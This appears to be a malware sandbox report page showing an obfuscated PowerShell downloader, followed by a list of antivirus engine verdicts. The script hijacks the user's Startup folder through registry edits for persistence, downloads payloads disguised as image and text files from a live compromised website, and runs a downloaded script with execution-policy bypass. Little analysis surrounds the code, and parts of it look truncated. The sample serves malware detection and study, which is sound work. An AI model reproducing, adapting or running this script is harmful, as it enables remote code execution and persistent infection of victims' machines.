Static | ZeroBOX
No static analysis available.
$A0="C:kkk.com\Run".Replace("kkk.com","\Users\Public")
$A1 = "CrEP".Replace("EP","eateDirectory")
$BB = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$CC= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$DD = "C:leejonkun".Replace("leejonk","\Users\Public\R")
$EE ="C:kimjongun".Replace("kimjong","\Users\Public\R")
$cv = 'C:\Uscbs'.Replace("c","ers\Public\Run\Run.v")
$cd = 'C:\js1'.Replace("j","Users\Public\ToT.p")
$ee = "C:\jav.com.ps1".Replace("jav.com","Users\Public\ToT")
$JU = 'https://mackcatlabor.com/wp-content/plugins/worker/src/Gelf/vFBofA11ZD8ZTm00.jpg'
[system.io.directory]::$A1($A0)
start-sleep -s 5
Set-ItemProperty -Path $BB -Name "Startup" -Value $DD;
Set-ItemProperty -Path $CC -Name "Startup" -Value $EE;
start-sleep -s 5
Function rr
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://mackcatlabor.com/wp-content/plugins/worker/src/Gelf/HXQ6fLudueVLQw0o.txt',$cv)){
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"($JU, $cd)){
start-sleep -s 3
powershell -windo 1 -noexit -exec bypass -file $ee
IEX rr
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb PowerShell.DownLoader.1403
MicroWorld-eScan Heur.BZC.PZQ.Boxter.794.B7F320FE
FireEye Heur.BZC.PZQ.Boxter.794.B7F320FE
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen281
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.794.B7F320FE
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Rising Clean
Ad-Aware Heur.BZC.PZQ.Boxter.794.B7F320FE
Emsisoft Heur.BZC.PZQ.Boxter.794.B7F320FE (B)
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Ikarus Clean
GData Heur.BZC.PZQ.Boxter.794.B7F320FE
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Heur.BZC.PZQ.Boxter.794.B7F320FE
MAX malware (ai score=81)
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.